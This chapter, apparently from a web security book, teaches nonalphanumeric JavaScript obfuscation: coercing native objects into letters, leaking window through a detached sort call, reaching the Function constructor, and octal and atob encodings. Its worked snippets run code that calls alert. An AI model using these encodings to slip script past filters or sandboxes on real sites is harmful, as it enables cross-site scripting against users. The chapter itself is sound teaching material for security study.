Chapter 4. Nonalphanumeric JavaScript
Information in this chapter:
• Nonalphanumeric JavaScript
• Use Cases
Abstract:
It is believed that nonalphanumeric JavaScript has its roots in contests such as the Obfuscated C contest and Obfuscated Perl contest. These contests were designed to show how creative programmers could be in hiding normal source code using the general syntax of the Perl language. After providing a brief history of nonalphanumeric JavaScript, this chapter takes an in-depth look at how nonalphanumeric JavaScript code works. In JavaScript, objects usually return a string form of their contents when concatenated with another string. In addition, type coercion can produce number-based strings without specifically using numerical characters. The loosely typed nature of JavaScript also helps produce characters that strongly typed languages would find very difficult to produce. These topics are all discussed in this chapter to give you a solid background on the principles of how to create and execute nonalphanumeric JavaScript code. The chapter concludes with a number of interesting use cases.
Key words: Infix operator, Hackvertor, International Obfuscated C Code Contest, String index, JavaScript arithmetic operator, JavaScript assignment operator, Small code, Not a Number object, Binary to ASCII function, ASCII to binary function
It is believed that nonalphanumeric code originated in contests such as the Obfuscated C and Obfuscated Perl contests. These contests were designed to show how creative programmers could be in hiding normal source code using the general syntax of the language. The C contest started in 1984, and although my coauthors and I could not find specific examples of nonalphanumeric obfuscation, many of the techniques that the contestants employed are still being used today. The goals of the International Obfuscated C Code Contest (IOCCC) are as follows1:
• To write the most Obscure/Obfuscated C program
• To show the importance of programming style, in an ironic way
• To stress C compilers with unusual code
• To illustrate some of the subtleties of the C language
• To provide a safe forum for poor C code :-)
If the IOCCC represents the birth of nonalphanumeric obfuscation, Perl represents the evolution. Perl makes it easy to produce nonalphanumeric code because of its default variables and its flexibility. The Obfuscated Perl contest ran from 1996 to 2000. Started by The Perl Journal (www.foo.be/docs/tpj/), the contest took its name from the Obfuscated C contest and was heavily inspired by it. Loosely typed languages have an advantage over strongly typed languages such as C because they often allow variables to be undeclared. Perl is loosely typed and perfect for obfuscation because, as Perl creator Larry Wall says:
There's more than one way to do it3
Because of Perl's flexibility, nonalphanumeric code is a breeze in Perl. The following code4 produces the text “hello world”:
''=~('(?{'.('._@@/^'^'^-).[~').'"'.('(:@@@^_@_@@_'^'@_,,/~(/-,$}').',$/})')
JavaScript nonalphanumeric code started in Japan, when a Ruby developer created some obfuscated Ruby code that prompted Yosuke Hasegawa to post a JavaScript version to the sla.ckers.org security forums (http://sla.ckers.org/forum/read.php?2,15812,page=14#msg-28465). This was truly groundbreaking for JavaScript, as nobody had ever seen code used in this way. This epic post spawned various new contests to create smaller and better versions of the code. During this time, the difficulty in producing certain characters such as the letter p became apparent due to the limitations of the text returned by native JavaScript objects. Therefore, to produce smaller code we had to discover new ways, or hacks, to generate these characters or to return to the window object. The contests can be viewed at the sla.ckers.org forums:
• “Diminutive NoAlphanumeric JS Contest,”http://sla.ckers.org/forum/read.php?24,28687
• “JavaScript Smallest NonAlnum Quine,”http://sla.ckers.org/forum/read.php?24,33201
• “Less chars needed to run arbitrary JS code,”http://sla.ckers.org/forum/read.php?24,32930
_=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___;$$=({}+"")[_____]+({}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")[$]+(($==$)+"")[_]+(($==$)+"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}+"")[_]+(($==$)+"")[_];$$$=(($!=$)+"")[_]+(($!=$)+"")[__]+(($==$)+"")[___]+(($==$)+"")[_]+(($==$)+"")[$];$_$=({}+"")[_____]+({}+"")[_]+({}+"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+({}+"")[_]+({}[$]+"")[__]+(($==$)+"")[___];($)[$$][$$]($$$+"('"+$_$+"')")()
// Yosuke Hasegawa's initial no-alnum code snippet
Nonalphanumeric JavaScript
Now that you know the history, you may still be wondering, how does nonalphanumeric JavaScript code work? In JavaScript, objects usually return a string form of their contents when concatenated with another string. In addition, type coercion can produce number-based strings without specifically using numerical characters. The loosely typed nature of JavaScript also helps produce characters that strongly typed languages would find very difficult to produce. We often refer to JavaScript as the language of hackers because of its surprising syntax and flexibility.
One of the most basic forms of nonalphanumeric code in JavaScript involves the use of infix operators to acquire numbers. Numbers are the basic requirement for producing code, as string indexes require a position in the string.
String indexes refer to using numerical characters to obtain a single character in a string. For example, in the string “abc”, you can refer to the letter a by using a string index of zero (e.g., "abc"[0]).
Making a number from a string is pretty easy in JavaScript. You need a string or an object that converts to a string, and an operator that performs a numeric conversion. Tables 4.1 and 4.2 list the various JavaScript operators.
Table 4.1 JavaScript Arithmetic Operators6 (examples assume y = 5)
Operator | Description | Example | Result
+ | Addition | x = y + 2 | x = 7
- | Subtraction | x = y - 2 | x = 3
* | Multiplication | x = y * 2 | x = 10
/ | Division | x = y / 2 | x = 2.5
% | Modulus (division remainder) | x = y % 2 | x = 1
++ | Increment | x = ++y | x = 6
-- | Decrement | x = --y | x = 4
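Table 4.2 JavaScript Assignment Operators7 (examples assume x = 10 and y = 5)
Operator | Example | Same As | Result
= | x = y | | x = 5
+= | x += y | x = x + y | x = 15
-= | x -= y | x = x - y | x = 5
*= | x *= y | x = x * y | x = 50
/= | x /= y | x = x / y | x = 2
%= | x %= y | x = x % y | x = 0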
The operators we are most interested in for our purposes are +, −, /, *, ++, and −−. These provide us with a quick way to turn our object into a number. Table 4.3 lists what are believed to be the shortest possible ways to create zero without using zero.
Table 4.3 Shortest Possible Ways to Create Zero without Using Zero
Characters | Result
+[] | 0
+'' | 0
+"" | 0
-[] | 0
-'' | 0
-"" | 0
In Table 4.3, each piece of code is using an infix operator to convert our object into a number. In JavaScript, if you use a + or − at the beginning of an object, you convert the object into a number regardless of what the object is. The value of the number usually depends on whether the result is true or false or whether the resultant string contains a number. To understand this better, consider the following examples:
alert(true+true)//2
alert(true+false)//1
alert(false+false)//0
Each operand is a Boolean value, and + is used to add the values together. JavaScript automatically handles the types and converts them into what it sees as the desired types for the operation. In this case, true is converted to 1 and false to 0. Back to Table 4.3: an empty string converts to zero, and an empty array is first converted to an empty string and then to zero. Whenever JavaScript performs a numerical operation on a true or false value, it automatically converts the value to one for true and zero for false.
Although other operators, such as − and *, among others, can be used for numeric conversion, you are better off using + as it performs concatenation as well as acting as an infix operator. This allows you to use fewer characters for your nonalphanumeric code.
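The conversions described above can be checked directly. The following is a minimal sketch; the variable names are ours and are used only for illustration.

```javascript
// Unary + converts its operand to a number.
const zeroFromArray = +[];      // [] -> "" -> 0
const zeroFromString = +'';     // "" -> 0
const two = true + true;        // true -> 1, so 1 + 1
const one = +!![];              // !![] is true, and +true is 1

// Binary + concatenates as soon as one side becomes a string.
const emptyString = [] + [];    // "" + ""
const zeroAsString = +[] + [];  // 0 + "" -> "0"

console.log(zeroFromArray, zeroFromString, two, one);          // 0 0 2 1
console.log(typeof emptyString, JSON.stringify(zeroAsString)); // string "0"
```

This dual role is why + is preferred: the same character yields both numbers and strings.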
The next stage in the obfuscation process is to gain alpha characters without directly using them. In this case, we can use JavaScript's automatic toString() conversions of native objects, which works by returning a string based on the object used. If, for example, you define a JavaScript object using the object literal, the result when concatenated in most JavaScript engines will be [object Object]. You can see already that if we can obtain a number and an object, we can get the characters [, o, b, j, e, c, t, and so on without referencing those characters directly. To see how this works, observe the following code sample which returns the letter o by converting a literal object:
_={}+'';//[object Object]
alert(_[1])//o
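To get a feel for which letters are within reach, the sketch below gathers the strings produced by a handful of native values and lists every letter they contain. It is written in ordinary JavaScript for readability, and the choice of source values is our own assumption rather than a complete inventory.

```javascript
// Strings that native values produce when concatenated with ''.
const sources = [{} + '', true + '', false + '', undefined + '', NaN + ''];
// -> "[object Object]", "true", "false", "undefined", "NaN"

// Collect every distinct character reachable by indexing those strings.
const reachable = new Set(sources.join(''));
const letters = [...reachable].filter(c => /[a-z]/i.test(c)).sort().join('');

console.log(letters);            // NOabcdefijlnorstu
console.log(reachable.has('p')); // false
```

Letters such as p and v are missing from these sources, which is why they need other techniques.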
We know how to obtain numbers and get strings from objects, but how do we actually execute the code of our choice? One trick is to return to window; once you have window, you have all the properties of window. This is not your only choice, however. If you can access a constructor you can access the Function constructor to execute arbitrary code. The problem is that constructor is a long word, and it requires a great deal of work to get the necessary characters. Fortunately, there are shortcuts we can employ to get our objects. My coauthors and I consider the shortest possible way to get window to be:
//Compatible at time of writing with Chrome, Firefox, Opera, Safari but NOT IE
alert((1,[].sort)())//window!
This is the shortest possible way to get window because sort is quicker to obtain than, for example, reverse. In the code, the sort function can accept an argument with a function. We do not supply the function, but we do store a reference to the actual sort function and not to the array. The comma is required; you could do the same thing using a normal assignment, but this way is shorter. We need to reference the sort function, so it leaks to window. When JavaScript loses a reference to the current object that a function was called on it reverts to the global object (window). The sort and reverse techniques start with a reference to a standard array literal. Then, instead of calling the object and then the method, we simply store a reference to the method in another variable. Thus, the window is returned when the method is called as the array literal has been lost.
Window objects shouldn't leak! They can break sandboxes and create obfuscation vectors. Thankfully, ECMAScript 5 recognizes this, and future versions of JavaScript will not leak window in this way.
Hopefully, you now understand the basics, so it is time to move things up a couple of gears. Our first task will be to produce a simple string, “alert”, without using any alphanumeric characters. When producing this code think about each step and concentrate on making the code smaller. Then, when you have completed each step, you can join them together. This will also enable you to borrow code from each snippet.
When creating each section of your nonalphanumeric code create duplicates separate from the main code, and place them in comments and add labels so that you know what output they produce.
Let us start with the letter a. At this point, it is useful to ask yourself which objects contain the letter a. The first that comes to mind is NaN (Not a Number). This can be returned in JavaScript when a numeric operation is performed on a value that isn't a legal number; JavaScript returns the result of the operation as NaN. The following code snippet shows how to get NaN without alphanumeric characters:
+[][+[]]//result: NaN
What happened here? This is a good question to ask yourself if you want to understand the code: look at smaller fragments and work out what each operation does. Here the trick is to look at the second set of square brackets; +[] creates a zero inside a property accessor. So, from the right it looks like [+[]]; then, farther left, a new array is created with [], so you are looking up element 0 of an empty array, which returns undefined because the element does not exist. Finally, we use the infix operator, +, to convert undefined into a number; JavaScript decides that it cannot be a valid number, so it returns NaN.
The basis of nonalphanumeric techniques is to use the string output of native JavaScript objects. In the preceding case, we have the characters NaN because the JavaScript engine returns NaN after our code and allows us to convert it into a string using +''.
Now we continue with a more complex example. We walk through the process of creating the string “alert” by using native JavaScript objects without using any of the letters in the string. To create the a we can use the NaN example in the preceding code sample. We will wrap that in parentheses with a +[] to convert it to a string. Then we will access the middle character of “NaN” by specifying index 1; ++[[]][+[]] is the number 1, which is a quirk in JavaScript discovered by Oxotnick from the sla.ckers forums (see http://sla.ckers.org/forum/read.php?24,32930,32989#msg-32989). Normally, the increment/decrement operators can only be applied to a variable or property, not to a literal value, but Oxotnick found a way around this by using an array with one element. This element can be any object that converts to zero; incrementing it converts it to a number and produces 1.
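The same evaluation can be spelled out one step at a time. This is only an illustrative sketch; the intermediate variable names are ours.

```javascript
const index = +[];               // 0
const missing = [][index];       // element 0 of an empty array: undefined
const notANumber = +missing;     // undefined has no numeric value: NaN
const asText = notANumber + [];  // the string "NaN"

console.log(index, missing, notANumber, asText); // 0 undefined NaN NaN
console.log(Number.isNaN(+[][+[]]));             // true
```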
(+[][+[]]+[])[++[[]][+[]]]//a
Next we will create the letter l. The first object that comes to mind for creating l is a Boolean false; if we can convert the Boolean into a string we can access the l by using the previous technique to increment the number. A quick way to obtain a Boolean value is to use the ! (NOT) operator; this converts any value into a Boolean and returns its opposite. In JavaScript, as we discussed in Table 4.3, strings and arrays can be converted into a number based on their contents. This is easily demonstrated by comparing a string to a number; as JavaScript is a loosely typed language, the string value is automatically converted.
''==0//true
As the preceding code sample demonstrates, the empty string is converted into zero automatically in JavaScript. This happens when an operator is used. When you use the NOT operator, the value is first converted into a Boolean, and the result is the opposite of that Boolean.
We will look at the next code sample in two stages so that it is easier to understand. The first part will create the string “false” and the second part will create the number 2. We will combine them to create the letter l. Creating the “false” string is pretty straightforward. We use a blank array (which, being an object, counts as true) and then the NOT operator to obtain our Boolean false. Then we wrap this in an array and add another blank array, which converts it into a string. Here is the first part of the code:
([![]]+[])//the string "false"
We almost have our l; now we need to access the third letter of “false.” JavaScript strings, like arrays, are indexed from zero, so we need the number 2 to access the third element of the string. We can use the previous method of obtaining the number 1 and then place it within an array and increment it to produce 2.
++[++[[]][+[]]][+[]]//2
Combining the two samples together produces the letter l. We just have to use another [ and ] after the string and place our number inside. The code looks like this:
([![]]+[])[++[++[[]][+[]]][+[]]]//"l"
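The nesting pattern generalizes to any small number. The sketch below uses a helper of our own, nestedNumber (a hypothetical name, not part of any library), that emits an expression made only of +, [ and ]. It starts from +[] rather than the bare [] used above, which is an assumption made to keep the loop uniform.

```javascript
// Build an expression for a non-negative integer n using only + [ ].
function nestedNumber(n) {
  let expr = '+[]';                    // 0
  for (let i = 0; i < n; i++) {
    expr = '++[' + expr + '][+[]]';    // wrap in an array, then increment element 0
  }
  return expr;
}

console.log(nestedNumber(2));                // ++[++[+[]][+[]]][+[]]
console.log(eval(nestedNumber(2)));          // 2
console.log('false'[eval(nestedNumber(2))]); // l
```

The expression grows by nine characters per increment, so this approach is only practical for small indexes.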
We have both a and l now, but how can we obtain e? If you have been following along, you'll know that one way to obtain e is to use a Boolean again. This time, however, we can use “true” as it's shorter and will produce a smaller amount of code.
It is always a good idea to use objects with a smaller string length where possible. This way, your obfuscated code will be easier to produce and will require fewer characters.
Again, the same technique is used to obtain the number. We simply wrap the 2 in another array, access the first element, and increment again to produce the number 3. We then use a second NOT operator to turn false into true, and convert the result into the string “true”.
([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]//"e"
Obtaining r requires a similar technique to e. We can use “true” again, but this time we only need the second character of the string, which is at index 1.
([!![]]+[])[++[[]][+[]]]//"r"
The examples in this chapter were designed to be easy to follow, but they often do not represent the smallest optimized versions. For more up-to-date techniques and ways to produce characters with smaller amounts of code, consult the community cheat sheet on sla.ckers.org, at http://sla.ckers.org/forum/read.php?24,33349.
To create the character t, we can again use the Boolean “true”—but this time we'll use the first element of the string, so we only need a zero.
([!![]]+[])[+[]]//"t"
When assembling your obfuscation always store each character separately and concatenate them at the end. Not only is this easier to follow, but if you get a syntax error it is much easier to debug.
Our task is now complete. We can assemble our “alert” string by combining each of the code samples. Here is the final string:
alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])//"alert"
As you may have noticed, certain letters are harder to obtain than others. Depending on their position in a native object, others may not be obtainable at all using a limited range of characters.
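The manual process used for “alert” can be automated. The following is a rough sketch under our own assumptions: the helper names (numberExpr, charExpr, stringExpr) and the SOURCES table are hypothetical, and only four source strings are covered, so many characters are out of reach.

```javascript
// Source strings and the nonalphanumeric expressions that produce them.
const SOURCES = {
  'false': '([![]]+[])',
  'true': '([!![]]+[])',
  'NaN': '(+[][+[]]+[])',
  'undefined': '([][+[]]+[])'
};

// Expression for a small non-negative integer, using only + [ ].
function numberExpr(n) {
  let expr = '+[]';
  for (let i = 0; i < n; i++) expr = '++[' + expr + '][+[]]';
  return expr;
}

// Expression for one character, taken from the first source that contains it.
function charExpr(ch) {
  for (const [text, expr] of Object.entries(SOURCES)) {
    const i = text.indexOf(ch);
    if (i !== -1) return expr + '[' + numberExpr(i) + ']';
  }
  throw new Error('no source for ' + JSON.stringify(ch));
}

// Expression for a whole string: one character expression per letter, joined with +.
function stringExpr(s) {
  return [...s].map(charExpr).join('+');
}

const encoded = stringExpr('alert');
console.log(/^[^a-z0-9]+$/i.test(encoded)); // true
console.log(eval(encoded));                 // alert
```

The output is far from minimal, because every index is rebuilt from scratch; storing numbers and letters in variables, as later examples in this chapter do, shortens it considerably.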
Advanced nonalphanumeric JavaScript
Thus far, you have learned how to create a string using nonalphanumeric code. But how do you execute it? And how do you generate it in the first place? In this section, we will execute the string we generated previously and learn how to generate nonalphanumeric code.
The first task to execute some code is to obtain a native object such as window, which can enable you to call a function or evaluate a string. One way to obtain window in Firefox and other browsers is to use the array object to leak back to window using the sort method. Normally, when sort is executed on an array it has a reference to the array being used. If you can “lose” the reference, however, JavaScript will use the global object window instead. The following two examples show a normal sort operation and one in which the reference is lost and returns to window.
alert([3,2,1].sort());//1,2,3
alert((1,[].sort)())//[object Window]
If you try the preceding examples in Firefox, you will see that the array is sorted correctly in the first line and the second line returns window. This works because the comma operator (,) returns the sort function, and as the sort function is executed directly, it has no way of knowing which array it references, so it returns window.
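The underlying rule, that a function called without a receiver falls back to the global object, can be sketched with a user-defined function. The names holder and whoAmI are hypothetical. We build the function with the Function constructor because such functions are never in strict mode; in engines that follow ECMAScript 5 and later, the built-in sort is expected to throw a TypeError instead of returning window when it is called this way.

```javascript
// A non-strict function that simply reports its receiver.
const holder = { whoAmI: new Function('return this') };

const viaMethodCall = holder.whoAmI();  // called on holder, so this is holder
const detached = (1, holder.whoAmI)();  // the comma operator drops the receiver

console.log(viaMethodCall === holder);  // true
console.log(detached === globalThis);   // true
```

In a browser, globalThis is the window object.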
Now that we know a method for obtaining window, we need to generate “sort” with nonalphanumeric characters. If you remember from the preceding section, we already have r and t, so we will begin with s. False can again be used to obtain our letter. We need the fourth element of the string which is indexed as 3; we therefore need to generate the number 3 and use the string “false.” These code samples should start looking familiar to you now.
([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]//"s"
To obtain o we need to introduce some new characters. It is possible to generate o using the characters we have been using; however, the code would be very large, and in this chapter, we're trying to keep the examples easy to follow. As such, we can use { and } to generate o. A JavaScript object's default toString is [object Object], so we can get our letter o by using the second character of that string, at index 1.
([]+{})[++[[]][+[]]]//"o"
Each JavaScript object has a toString method which is called when the object is converted to a string.
Using our previously generated characters, we can assemble our “sort” string quite easily, and we can generate the window object. I have commented the code and separated each section so that you can see how the window object is generated.
([],[][
([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]//"s"
+
([]+{})[++[[]][+[]]]//"o"
+
([!![]]+[])[++[[]][+[]]]//"r"
+
([!![]]+[])[+[]]//"t"
])()
Once we have the window object, we can then use our “alert” string to call the function by accessing the method and passing our string. I added a little shortcut to generate the number 1; I will leave it as an exercise for you to work out and understand how the final number is generated.
([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]])()[(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]](+!![])//calls alert(1)
All examples were tested on Firefox. Obfuscated code is possible on other browsers; however, Firefox was used because of its ability to generate window in a smaller amount of code.
At this point, we know how to call static methods of the window object, such as alert, but to evaluate code we need a method for converting a string and evaluating it. JavaScript offers a variety of ways to do this: we can use eval, Function, setTimeout, setInterval, and even the location object by passing a JavaScript string. Once we have a method for evaluating code, we can then generate characters using escapes. This allows us to generate any character, but we still have the problem of generating our strings which form our evaluation function, such as eval. Also, getting the character v is not an easy task with nonalphanumeric code. When competing in various sla.ckers contests it became clear that the shortest possible method for obtaining an evaluation function was to use the constructor. Using the array constructor, you can execute code of your choice, as demonstrated in the following code snippet:
[].constructor.constructor("alert(1)")()//call Function and execute "alert(1)"
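The constructor chain can be verified with a harmless payload. This is a small sketch; FunctionCtor and answer are names of our own.

```javascript
// The constructor of an array is Array, and the constructor of Array is Function.
const FunctionCtor = [].constructor.constructor;
console.log(FunctionCtor === Function);              // true

// Any function works as a starting point, including [].sort.
console.log([]['sort']['constructor'] === Function); // true

// Build and run a function from a string.
const answer = FunctionCtor('return 6 * 7')();
console.log(answer);                                 // 42
```

Because property names can be given as strings in square brackets, the only remaining problem is producing the strings “sort” and “constructor” without letters.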
Accessing the constructor twice from an array object returns Function. If we can generate the characters c, o, n, and so on we can call the constructor and execute code using nonalphanumeric characters. To begin, we need the character c. We can reuse the previous code in this chapter where we generated “sort” as the function. It will return the following text: function sort() {[native code]}. We can get our c from the text of the sort function.
This time we will reuse our generated letters by assigning them to variables, as we discussed in the section “Unicode variables” in Chapter 3. You can generate nonalphanumeric variables by using the code in Chapter 3 to generate your own variables, but to make the examples easier here we will use the Hackvertor tag <@jsvariable_0(150, 200)/> to generate any valid variables in the range 150–200.
Developed by one of the authors of this book, Hackvertor is a free tool designed to help you generate nonalphanumeric variables. It is available at http://tinyurl.com/jsvariables.
Hackvertor can be used as a conversion utility, browser hacking platform, targeted fuzzing tool, cross-site scripting filter testing tool—the list goes on. It was developed because my coauthors and I wanted to incorporate our style of Web site testing, in which we use one platform to perform all the tests instead of using a variety of different scripts.
The system works with sets of categorized tags which magically perform conversions and character replacement. The idea is that you feed it content and tell it to replace parts of the content with data that is difficult to convert, without running several conversion routines or manually coding the JavaScript. Consider the following example: <@dec_ent_2(;)><@hex_ent_1(;)>test<@/hex_ent_1><@/dec_ent_2>. This example includes the required tags in Hackvertor to perform HTML decimal encoding on “test” followed by hexadecimal entity encoding. You place the required text in the input window, select it, and then click the required tags. Once that's complete, you simply click Convert to perform the operation.
a=([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]],//"s"
µ=([]+{})[++[[]][+[]]],//"o"
o=([!![]]+[])[++[[]][+[]]],//"r"
À=([!![]]+[])[+[]],//"t"
Á=[][a+µ+o+À]//function sort(){ [native code]}
As you can see in the preceding example, we assign each letter to a variable so that we can reuse them later; then we combine them to produce the sort function, which we also assign to a variable. To get our letter c, we now need to use our newly created variable Á by converting the sort function into a string and accessing the fourth element of the string indexed as 3, because remember, JavaScript indexes from zero.
We can also reuse numbers that we generate, assign zero to a variable, and so on. Let us start by storing the numbers 0 through 3 so that we can access our character c.
Â=+[],//0
Ã=++[[]][+[]],//1
Ä=Ã+Ã,//2
Å=Ä+Ã//3
The advantage of using variables here becomes apparent as we no longer need to duplicate code and instead can just add each number together to get our next number. To generate c we just reuse the sort function we stored in variable Á, convert it to a string, and access the character by using our variable Å, which is the number 3.
The next letter is o, which we already have in our variable µ; then we have n, which we can obtain by reusing the sort function, as it contains the letter n at the third position of the string: function(){[native code]}. We already have s, t, and r; u can be generated again from the sort function. Next comes c, which we already generated, and finally, t, to complete the string “constructor”.
(Á+[])[Å],//"c"
µ,//already contains "o"
(Á+[])[Ä],//"n"
a,//already contains "s"
À,//already contains "t"
o,//already contains "r"
(Á+[])[Ã],//"u"
(Á+[])[Å],//"c"
À,//already contains "t"
µ,//already contains "o"
o,//already contains "r"
In the preceding example, each chunk of code is followed by a comment, beginning with //, that explains what letter the chunk of code generates. Who would have thought that nonalphanumeric code could possibly get access to the Function constructor…
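Written with ordinary names and digits, the same assembly looks as follows. This is a readability sketch only; sortText and word are our own names, and it relies on the text of a native function beginning with the word “function”.

```javascript
const sortText = [].sort + '';  // begins with "function sort"
const word =
  sortText[3] +        // c
  ('' + {})[1] +       // o
  sortText[2] +        // n
  (false + '')[3] +    // s
  (true + '')[0] +     // t
  (true + '')[1] +     // r
  sortText[1] +        // u
  sortText[3] +        // c
  (true + '')[0] +     // t
  ('' + {})[1] +       // o
  (true + '')[1];      // r

console.log(word);                       // constructor
console.log([].sort[word] === Function); // true
```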
As you have seen, the ability to execute code allows us to generate strings and access characters that were previously unobtainable. If you have trouble reproducing this code look at each line separately and make sure there is a terminating comma at the end of each line, except for the last line. If you managed to produce the code exactly, consider yourself a code obfuscation ninja.
You might have noticed that a few variables could reduce the code further, and there are in fact a couple of ways to squeeze more characters from each code chunk. Before you move on to the next section, try to reduce the code further and remove the comments as a personal challenge.
a=([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]],//"s"
µ=([]+{})[++[[]][+[]]],//"o"
o=([!![]]+[])[++[[]][+[]]],//"r"
À=([!![]]+[])[+[]],//"t"
Á=[][a+µ+o+À],//function sort(){ [native code]}
Â=+[],//0
Ã=++[[]][+[]],//1
Ä=Ã+Ã,//2
Å=Ä+Ã,//3
//sort, "c", "o", "n","s","t","r","u","c","t","o","r"
Á[(Á+[])[Å]+µ+(Á+[])[Ä]+a+À+o+(Á+[])[Ã]+(Á+[])[Å]+À+µ+o]("alert(1)")()
Creating characters
Creating more characters, especially in cases where we are limited to the ones we can find on default toString methods, can be challenging. A few tables have been compiled from the proofs of concept (PoCs) that have been created5 (see http://sla.ckers.org/forum/read.php?24,32930,page=2 and http://sla.ckers.org/forum/read.php?24,33349). However, we still are missing some characters in most character sets. What can we do about this?
We also need to generate the string “return” because, when we use the Function constructor, a string literal that is not returned is evaluated and then discarded, so our string never reaches the caller. To see how this works in ordinary alphanumeric code, check the following example:
alert(Function('return'+'\'\\'+'1'+'4'+'1\'')())//"a"
As you can see, this will allow us to generate any code we like. Let us create the code alert(“obfuscated”) using our technique. Our first task will be to create the string “return”; we already have most of the characters, so we will not duplicate the code at this point. Instead, we will just display the variables we have already collected.
Octal escape sequences use base 8 and the backslash character, followed by a number, to indicate that you wish to use an octal escape. The number represents the ASCII/Unicode number you want to display.
o+//"r"
(!![]+[])[Å]+//"e"
À+//"t"
(Á+[])[Ã]+//"u"
o+//"r"
(Á+[])[Ä]//"n"
We have assembled our string “return”; however, since there is no way for us to generate a backslash without actually using a literal backslash, we can skip that character for now. We now need to look at the string we want to encode. You can, of course, use shortcuts, and we recommend you do by reusing letters you have already created, but we will leave that as an exercise for you.
The string alert(“obfuscated”) looks like this when it is octal-encoded: \141\154\145\162\164\50\42\157\142\146\165\163\143\141\164\145\144\42\51. It is a good idea to store the backslash in a variable, as it is repeated quite often. We only need to enclose the escapes within a string; otherwise, a syntax error will be raised. We'll create a new set of variables to use using Hackvertor again; this time <@jsvariable_2(200, 250)/> is the tag we will use. Assigning the backslashes is the first step toward creating a new variable. Then we add the return string we created previously and enclose it within an escaped string literal before continuing to create all the escape sequences.
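The encoding step can be reproduced with a short helper. This is a sketch under our own assumptions: toOctalEscapes is a hypothetical name, and it only handles characters with codes up to 255, the largest value an octal escape can hold.

```javascript
// Convert each character to a backslash followed by its code in base 8.
function toOctalEscapes(text) {
  return [...text].map(ch => {
    const code = ch.charCodeAt(0);
    if (code > 255) throw new RangeError('cannot octal-escape ' + ch);
    return '\\' + code.toString(8);
  }).join('');
}

const payload = 'alert("obfuscated")';
const escaped = toOctalEscapes(payload);
console.log(escaped);

// Decode as the chapter does: return the escapes inside a string literal.
// Functions built by the Function constructor are non-strict, so octal
// escapes are accepted there.
const decoded = Function("return'" + escaped + "'")();
console.log(decoded === payload); // true
```

The decoded text is only a string at this point; a second call to Function is what actually runs it.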
Here is the final code. As you can see, all the work we completed in previous sections comes together to produce an obfuscated string that even a trained eye would have a hard time decoding.
a=([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]],//"s"
µ=([]+{})[++[[]][+[]]],//"o"
o=([!![]]+[])[++[[]][+[]]],//"r"
À=([!![]]+[])[+[]],//"t"
Á=[][a+µ+o+À],//function sort(){ [native code]}
Â=+[],//0
Ã=++[[]][+[]],//1
Ä=Ã+Ã,//2
Å=Ä+Ã,//3
È='\\',
É=Å+Ã,//4
Ê=É+Ã,//5
Ë=Ê+Ã,//6
Ì=Ë+Ã,//7
//sort, "c", "o", "n","s","t","r","u","c","t","o","r"
Á[(Á+[])[Å]+µ+(Á+[])[Ä]+a+À+o+(Á+[])[Ã]+(Á+[])[Å]+À+µ+o](Á[(Á+[])[Å]+µ+(Á+[])[Ä]+a+À+o+(Á+[])[Ã]+(Á+[])[Å]+À+µ+o](
//return
o+(!![]+[])[Å]+À+(Á+[])[Ã]+o+(Á+[])[Ä]+
//'\141\154\145\162\164\50\42\157\142\146\165\163\143\141\164\145\144\42\51'
'\''+È+Ã+É+Ã+È+Ã+Ê+É+È+Ã+É+Ê+È+Ã+Ë+Ä+È+Ã+Ë+É+È+Ê+Â+È+É+Ä+È+Ã+Ê+Ì+È+Ã+É+Ä+
È+Ã+É+Ë+È+Ã+Ë+Ê+È+Ã+Ë+Å+È+Ã+É+Å+È+Ã+É+Ã+È+Ã+Ë+É+È+Ã+É+Ê+È+Ã+É+É+È+É+
Ä+È+Ê+Ã+'\'')())()//call Function twice
Another way to get alphanumeric characters using nonalphanumeric characters is with the binary to ASCII (btoa) function. This function, available in Firefox, encodes binary data as base64, and we can use it to generate ASCII characters from nonalphanumeric characters. To do this, we simply pass a binary blob to the btoa function; for example, passing the three characters £, the unprintable control character U+0006, and ¬ returns the string “owas”. This proved to be the smallest algorithm for generating arbitrary letters, and was used in the OWASP AppSec diminutive nonalphanumeric JavaScript contest (see https://lists.owasp.org/pipermail/appsec_eu_2010/2009-September/000005.html) that challenged participants to find the smallest nonalphanumeric JavaScript code that executed alert(“owasp”). The winning entry was submitted by Mario Heiderich, one of this book's coauthors, and reads as follows:
ω=[[T.,Ŕ,,É,,Á,Ĺ,Ś,,,Ó,B.]=!''+[!{}]+{}][Ś+Ó+Ŕ+T.],ω()[Á+Ĺ+É+Ŕ+T.](Ó+ω()[B.+T.+Ó+Á]('Á«)'))
The code works by generating a binary string that represents the unencoded version of the string we want to generate. To do this, we can use the complement of btoa, called atob. This function (ASCII to binary) will decode a base64-encoded string into a binary string, and therefore allows us to generate what we need. The difference between this method and others is that here we create strings all at once, whereas, for example, the octal+Function method requires us to create the string byte by byte.
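The relationship between the two functions can be sketched as follows, assuming an environment that provides the global atob and btoa functions (browsers and recent Node.js releases do). The variable names are ours.

```javascript
// atob decodes base64 text into a binary string; btoa is the inverse.
const blob = atob('owas');
const bytes = [...blob].map(ch => ch.charCodeAt(0).toString(16));
console.log(bytes.join(' '));             // a3 6 ac
console.log(btoa(blob));                  // owas

// The same trick yields longer words such as "toString".
const longerBlob = atob('toString');
console.log(longerBlob.length, btoa(longerBlob)); // 6 toString
```

Base64 output always comes in groups of four characters, so only words whose length is a multiple of four can be produced this way without padding.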
